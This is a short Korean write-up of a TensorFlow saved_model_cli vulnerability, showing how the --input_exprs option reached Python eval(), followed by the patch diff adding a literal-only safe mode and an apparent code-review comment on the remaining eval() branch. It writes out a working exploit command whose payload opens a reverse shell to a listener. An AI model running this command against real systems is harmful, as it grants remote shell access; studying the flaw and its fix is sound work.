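Tensorflow CVE 를 보다가 신기한 게 있었다.
바로 Tensorflow 내부에 존재하는 saved_model_cli 파일을 실행할 때 옵션을 다음과 같이 주면 리버스 쉘이 따인다는 것이다. ㅇㅅㅇ! 원인은 --input_exprs 에 준 문자열이 검증 없이 파이썬 eval() 로 넘어가기 때문이고, 명령 아래의 diff 는 기본값(safe=True)에서 ast.literal_eval 로 평가하도록 바꾼 패치다.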
saved_model_cli run --input_exprs 'hello=exec("""\nimport socket\nimport subprocess\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("0.0.0.0",33419))\nsubprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())""")' --dir ./ --tag_set serve --signature_def serving_default
def preprocess_input_exprs_arg_string(input_exprs_str):
def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):
"""Parses input arg into dictionary that maps input key to python expression.
Parses input string in the format of 'input_key=<python expression>' into a
dictionary that maps each input_key to its python expression.
Args:
input_exprs_str: A string that specifies python expression for input keys.
Each input is separated by semicolon. For each input key:
Each input is separated by semicolon. For each input key:
'input_key=<python expression>'
safe: Whether to evaluate the python expression as literals or allow
arbitrary calls (e.g. numpy usage).
Returns:
A dictionary that maps input keys to their values.
@@ -545,8 +548,15 @@
def preprocess_input_exprs_arg_string(input_exprs_str):
raise RuntimeError('--input_exprs "%s" format is incorrect. Please follow'
'"<input_key>=<python expression>"' % input_exprs_str)
input_key, expr = input_raw.split('=', 1)
# ast.literal_eval does not work with numpy expressions
input_dict[input_key] = eval(expr) # pylint: disable=eval-used
if safe:
try:
input_dict[input_key] = ast.literal_eval(expr)
except:
raise RuntimeError(
f'Expression "{expr}" is not a valid python literal.')
else:
# ast.literal_eval does not work with numpy expressions
input_dict[input_key] = eval(expr) # pylint: disable=eval-used
return input_dict
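Review bot: The `else:` branch still hands `expr` to `eval()`, so the fix only holds for callers that leave `safe` at its default; the call sites are outside this hunk, and any of them passing `safe=False` for text taken from `--input_exprs` keeps arbitrary code execution reachable. The `safe` entry in the docstring should say so, for example `safe=False runs the expression through eval() and must never be used on untrusted input.` Separately, the bare `except:` also catches `KeyboardInterrupt` and `SystemExit` and drops the original error; `except Exception as e:` with `raise RuntimeError(...) from e` keeps the cause. The function body starts above the hunk, so the loop that sets `input_raw` is not visible here.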